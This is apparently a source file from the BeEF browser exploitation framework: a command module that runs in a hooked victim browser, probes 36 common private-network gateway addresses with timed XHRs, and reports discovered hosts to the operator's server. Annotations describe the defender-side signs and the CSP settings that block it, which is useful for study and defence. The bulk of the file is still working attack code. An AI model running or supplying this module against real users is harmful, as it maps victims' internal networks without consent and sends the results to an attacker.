Path: blob/master/modules/network/identify_lan_subnets/command.js
//
// Copyright (c) 2006-2026 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

// Command module: identify_lan_subnets.
//
// Runs inside a hooked browser and uses XMLHttpRequest timing to guess which
// common private-range gateway addresses answer on HTTP. The <%= ... %> tags
// are ERB placeholders (command id, callback URL, timeout); presumably the
// BeEF server fills them in before the script is delivered -- confirm.
//
// What this looks like from the defender's side (all derived from the code below):
//   - 12 hard-coded /24 prefixes x 3 host suffixes (.1, .100, .254) = 36 plain
//     "http://<ip>" GET requests, issued one per `timeout` ms from a browser
//     process. A regular, paced burst of browser traffic to RFC 1918 gateway
//     addresses the user never typed is the observable pattern in proxy,
//     DNS-less flow, or endpoint network telemetry.
//   - The probes are cross-origin XHRs, so a Content-Security-Policy with a
//     restrictive `connect-src` on the page that got hooked blocks them, and
//     an HTTPS page blocks http:// XHRs as mixed content.
//   - The result check is scheduled with string-form setTimeout (see the end
//     of doScan); a CSP without 'unsafe-eval' blocks that form.
beef.execute(function() {

  // Only Firefox/Chrome are treated as supported (isFF / isC -- presumably
  // Firefox and Chrome checks; defined in the BeEF client library, not here).
  // NOTE(review): there is no `return` after the failure is reported, so the
  // scan below still runs on an unsupported browser.
  if(!beef.browser.isFF() && !beef.browser.isC()){
    beef.debug("[command #<%= @command_id %>] Browser is not supported.");
    beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=unsupported browser", beef.are.status_error());
  }

  // Floor for the per-request timeout (ms); also the fallback when the
  // operator-supplied timeout is missing or invalid.
  var min_timeout = 500;
  // Network addresses of the /24 prefixes that are probed. Only the first
  // three octets of each entry are used.
  var ranges = [
    '192.168.0.0',
    '192.168.1.0',
    '192.168.2.0',
    '192.168.10.0',
    '192.168.100.0',
    '192.168.123.0',
    '10.0.0.0',
    '10.0.1.0',
    '10.1.1.0',
    '10.10.10.0',
    '172.16.0.0',
    '172.16.1.0'
  ];

  // Runs one full pass over all candidate addresses using `timeout` (ms) both
  // as the XHR timeout and as the pacing interval between requests. May call
  // itself again with a smaller timeout (see checkResults).
  var doScan = function(timeout) {

    var discovered_hosts = [];
    var proto = "http";

    // Issues one asynchronous GET to http://<host> and records the host as
    // "discovered" purely from timing: the response body is never read.
    var doRequest = function(host) {
      var d = new Date;
      var xhr = new XMLHttpRequest();
      xhr.timeout = timeout;
      xhr.onreadystatechange = function(){
        if(xhr.readyState == 4){
          // Elapsed time from request creation to completion (ms).
          var time = new Date().getTime() - d.getTime();
          var aborted = false;
          // if we call window.stop() the event triggered is 'abort'
          // http://www.w3.org/TR/XMLHttpRequest/#event-handlers
          xhr.onabort = function(){
            aborted = true;
          }
          // The abort/loadend handlers are attached only once readyState 4
          // has been reached; the order relative to event dispatch matters.
          xhr.onloadend = function(){
            if(time < timeout){
              // 'abort' fires always before 'onloadend'
              // A host counts as present when the request finished in more
              // than 1 ms, in less than the timeout, and was not aborted.
              if(time > 1 && aborted === false){
                beef.debug('Discovered host ['+host+'] in ['+time+'] ms');
                discovered_hosts.push(host);
              }
            }
          }
        }
      }
      xhr.open("GET", proto + "://" + host, true);
      xhr.send();
    }

    // Build the candidate list: three host addresses per prefix.
    var requests = new Array();
    for (var i = 0; i < ranges.length; i++) {
      // the following returns like 192.168.0.
      var c = ranges[i].split('.')[0]+'.'+
              ranges[i].split('.')[1]+'.'+
              ranges[i].split('.')[2]+'.';
      // for every entry in the 'ranges' array, request
      // the most common gateway IPs, like:
      // 192.168.0.1, 192.168.0.100, 192.168.0.254
      requests.push(c + '1');
      requests.push(c + '100');
      requests.push(c + '254');
    }

    // process queue
    var count = requests.length;
    beef.debug("[command #<%= @command_id %>] Identifying LAN hosts ("+count+" URLs) (Timeout " + timeout + "ms)");
    // Total wait before results are evaluated: one timeout slot per queued
    // request plus one extra slot.
    var check_timeout = (timeout * count + parseInt(timeout,10));
    // One request is taken off the end of the queue every `timeout` ms.
    var handle = setInterval(function() {
      if (requests.length > 0) {
        doRequest(requests.pop());
      }
    }, timeout);

    // check for results
    // NOTE(review): `checkResults` is assigned without a declaration, so it
    // becomes an implicit global; the string-form setTimeout below depends on
    // that, because the string is evaluated in global scope.
    checkResults = function() {

      // Stop the pacing timer before evaluating what was collected.
      if (handle) {
        beef.debug("[command #<%= @command_id %>] Killing timer [ID: " + handle + "]");
        clearInterval(handle);
        handle = 0;
      }

      var hosts = discovered_hosts.join(",");
      beef.debug("Discovered " + discovered_hosts.length + " hosts: " + hosts);
      if (discovered_hosts.length >= 5) {
        // if we get 5+ results something probably went wrong. this happens sometimes.
        if (timeout > min_timeout) {
          // if timeout is more than 500ms then decrease timeout by 500ms and try again
          beef.debug("Returned large hit rate (" + discovered_hosts.length + " of " + count + ") indicating low network latency. Retrying scan with decreased timeout (" + (timeout - 500) + "ms)");
          doScan(timeout-500);
        } else {
          // Already at or below the minimum timeout: report the hit list as
          // an error rather than as a result.
          beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=unexpected results&hosts="+hosts, beef.are.status_error());
        }
      } else if (discovered_hosts.length == 0) {
        beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=no results", beef.are.status_error());
      } else {
        // 1 to 4 hits: report the comma-separated host list, then a
        // completion marker, to the command URL.
        beef.debug("[command #<%= @command_id %>] Identifying LAN hosts completed.");
        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'hosts='+hosts, beef.are.status_success());
        beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=scan complete");
      }
    }
    // String argument: evaluated like eval() when the timer fires. A page CSP
    // that omits 'unsafe-eval' blocks this call form.
    setTimeout("checkResults();", check_timeout);

  }

  // The timeout arrives as a templated string; anything non-numeric or below
  // 1 falls back to min_timeout before being parsed as a base-10 integer.
  var timeout = "<%= @timeout %>";
  if (isNaN(timeout) || timeout < 1) timeout = min_timeout;
  doScan(parseInt(timeout,10));

});